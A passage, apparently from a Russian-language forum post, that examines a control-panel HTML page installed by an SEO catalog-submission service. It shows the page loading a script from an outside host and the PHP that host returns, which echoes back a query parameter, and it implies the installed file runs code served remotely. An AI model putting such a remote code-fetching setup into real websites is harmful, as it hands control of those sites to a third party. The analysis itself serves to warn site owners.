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"></a></div> <div id="menu"> <button onclick="get_data('catalog')">ПРОГОН ПО КАТАЛОГАМ</button> <button onclick="get_data('spr')">РЕГИСТРАЦИЯ В СПРАВОЧНИКАХ</button> <div id="res">Файл установлен корректно</div> </div> <div id="links"><a href="#">ТУТ БУДУТ ГЕНЕРИРОВАТЬСЯ ОБРАТНЫЕ ССЫЛКИ, ЕСЛИ БУДЕТ НУЖНО</a></div> </div> <script src="http://cataloguing.ru/js/panel.min.js"></script> </body> </html> Простая HTML страница. Анализ JS кода не выдал ничего подозрительного. Если же например загрузить страницу по ссылке http://cataloguing.ru/work.txt?q=test, то мы увидим следующее: header("Content-type: text/xml; charset=UTF-8");echo base64_decode('PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVzdWx0PnRlc3Q8L3Jlc3VsdD4='); Если расшифровать результат выполнения скрипта выше, то мы получим следующее: <?xml version="1.0" encoding="UTF-8"?> <result>test</result> Как видим то что мы указали в q то и получилось <result> выполнения скрипта. Считаю свой моральный долг по анализу кода выполненным. Если что, можете меня дополнить